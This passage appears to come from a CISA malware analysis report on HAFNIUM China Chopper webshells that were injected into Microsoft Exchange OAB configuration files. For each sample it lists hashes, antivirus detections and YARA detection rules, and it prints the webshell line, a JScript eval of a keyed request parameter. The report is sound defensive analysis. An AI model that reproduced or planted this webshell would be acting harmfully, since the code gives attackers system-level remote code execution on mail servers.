Figure 6. -

411fef05a37e286a4e48700e5155cd55672cce4c9283b448d968391267b4f866

Tags

trojanwebshell

Details
Name pRd3rIlG.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 1c0e6e63818a2955cb368f7ae9a934da
SHA1 36531b3b859b7d875260a67e7ce5b59e48d46404
SHA256 411fef05a37e286a4e48700e5155cd55672cce4c9283b448d968391267b4f866
SHA512 9e770e8216c4cd9be6d0048208c5494b3ff4e5556478f895db6140cdf94c6048004e79ded020bcb7cc2987097f8454d13748337aca5fbae430f0758ab4d6370c
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaZVMr6j71idfhphE5g2Ze62E4ONF0qUUenf:kNrdepN1BXS0BM5QZphEYs4ONF0qI
Entropy 4.643510
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.2B8EEBDE
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.2B8EEBDE (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.2B8EEBDE
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.



In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:



---Begin Webshell---

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["oriWapL6n5CI"],"unsafe");)</script>

---End Webshell---



The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "oriWapL6n5CI" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots

Figure 7. -

dfa9f4a054636750012e0ff56286a3c96c37062959c8ac5b2df52e349de69e65

Tags

trojanwebshell

Details
Name GLuRqYO7.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 172e2090dcd8571d3d98e219a2e6b226
SHA1 1351bca8b60f74894d13553703597d861acd04ea
SHA256 dfa9f4a054636750012e0ff56286a3c96c37062959c8ac5b2df52e349de69e65
SHA512 a2f3800665492659e44494194ce9e032cd38b16d5c9fe1f8e0c1376e3ddf43860553813271d77bfb604b53c67768f0455d3c77c7b4c1c5a16ca18e66c7356d95
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaPfVMr6j71idfhphE5g1l+62E4ONF0qRvenf:kNrdepN1BXS0/M5QZphE0gs4ONF0qR2
Entropy 4.649797
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.FF1FE8E9
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.FF1FE8E9 (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.FF1FE8E9
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.



In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:



---Begin Webshell---

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["49tWiczXqjDb"],"unsafe");)</script>

---End Webshell---



The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "49tWiczXqjDb" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots

Figure 8. -

a58c4fdb1c31100f4e9bb530af7d1ac57c715fee1c7c5e6c790e1e9cc863cfe4

Tags

trojanwebshell

Details
Name 0GPd9cCt.aspx
Size 2166 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 0f8d4a9a0f41f1b347daa3ee3da48f54
SHA1 c6ff7631c088c60a461d70b47dd85aea9fc51019
SHA256 a58c4fdb1c31100f4e9bb530af7d1ac57c715fee1c7c5e6c790e1e9cc863cfe4
SHA512 5044011ef02042255fe35a01fe7b1063d77f8a269b6e67e0d09506dc102759f1bd2fbba379d46fb4f45ee9d64c88e497e5b78e76be7e5cc1609a8bf9615aec16
ssdeep 48:kNrdepN1BXS0ZPpM5QZphEaes4ONF0qZX:ktde/1Ea5NCqx
Entropy 4.644410
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.0D1ED0A3
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.0D1ED0A3 (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.0D1ED0A3
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.



In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:



---Begin Webshell---

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["eyidEfJpQboI"],"unsafe");)</script>

---End Webshell---



The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "eyidEfJpQboI" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots

Figure 9. -

e2caf75367ca300f616a96ff07769b1f80b69b1ae135fa27b79376a75a905b5e

Tags

trojanwebshell

Details
Name mDweIri6.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 981d83dc485048c3c8e4d74fb4a3eab6
SHA1 5537d6f6d321a623ebd7c785df4ada06cbe688c6
SHA256 e2caf75367ca300f616a96ff07769b1f80b69b1ae135fa27b79376a75a905b5e
SHA512 60c76e13d797a13d942481237c80ab082e02f744d6cabde724a9108acac737a7ddffce4a5ef6bae30ac2367617028d703853a3ff79a5f519e7348d44849f4e9a
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaxTQSVMr6j71idfhphE5ghI62E4ONF0qlenf:kNrdepN1BXS0geM5QZphESIs4ONF0qk
Entropy 4.649818
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.D98EFB85
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.D98EFB85 (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.D98EFB85
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.



In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:



---Begin Webshell---

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["YzVheMnJEUGo"],"unsafe");)</script>

---End Webshell---



The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "YzVheMnJEUGo" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots

Figure 10. -

58a6151413f281143a9390852b017b82ff40d402cdbc8295aa58ae46c4c8424f

Tags

trojanwebshell

Details
Name ydRlt1rF.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 9a597c67ad6cd1a448f58a2c8e5c4ca6
SHA1 7603dc2f7d940f8d27b6c36dcd8d66d5cca515ad
SHA256 58a6151413f281143a9390852b017b82ff40d402cdbc8295aa58ae46c4c8424f
SHA512 a62b048545eaddb6b234dc1d43a754e7550c8be6e2f8b05f85580c504796bcccacbbd7f9f48e34b1910af605fe3a29640e8efe166736623504afcacd762991c7
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaSVMr6j71idfhphE5gp62E4ONF0qgSnenf:kNrdepN1BXS0cM5QZphEIs4ONF0qgS+
Entropy 4.640063
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.C4E75356
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.C4E75356 (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.C4E75356
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.



In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:



---Begin Webshell---

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["H0fPTmgbRo41"],"unsafe");)</script>

---End Webshell---



The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "H0fPTmgbRo41" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots

Figure 11. -

a8c656d12b10d4fae74efc4cc7e585f5569f1a9144ebf6cd56b1bfed0dd7a440

Tags

trojanwebshell

Details
Name undMk5U9.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 674ad3430e17de5279ceae899ee2d951
SHA1 bed00a85dbb0cbf3766cb7b05d355db158190a40
SHA256 a8c656d12b10d4fae74efc4cc7e585f5569f1a9144ebf6cd56b1bfed0dd7a440
SHA512 547dbae802ff6b22406a2083db1b207844638df631a7f9339e2b9428b1685002c51261111c8d99cbf5adc2b19d4a78277193d11fc81a45c515639a89ea50f1d3
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMahBYVMr6j71idfhphE5g7Rj62E4ONF0qdenf:kNrdepN1BXS0SM5QZphEOJs4ONF0qs
Entropy 4.642646
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.6DFD588B
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.6DFD588B (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.6DFD588B
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.



In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:



---Begin Webshell---

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["VnDTHLB47e1O"],"unsafe");)</script>

---End Webshell---



The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "VnDTHLB47e1O" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots

Figure 12. -

1f5f5b8dd702da3628e8612d44563d8267fa160048a0da389ee821152ac658f2

Tags

trojanwebshell

Details
Name nypCBAQf.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 58b07454a038cd6bb1ca3d6ff4fa38ce
SHA1 e731bc758f81f8c6021d59a9ceda37e015d9587b
SHA256 1f5f5b8dd702da3628e8612d44563d8267fa160048a0da389ee821152ac658f2
SHA512 e78fe5eb06c96eb16b7272e8f9472a64ce29b40dd8f6a24e4b8d6074a1674ae0399b2775e5e8314b8d9fc15dae84fd3a20c492f1bd55c68d78acc332f24ac0bd
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaGVMr6j71idfhphE5gHUi62E4ONF0qhVenf:kNrdepN1BXS0QM5QZphE4Vs4ONF0qh0
Entropy 4.655976
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.3CB2ACFE
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.3CB2ACFE (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.3CB2ACFE
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

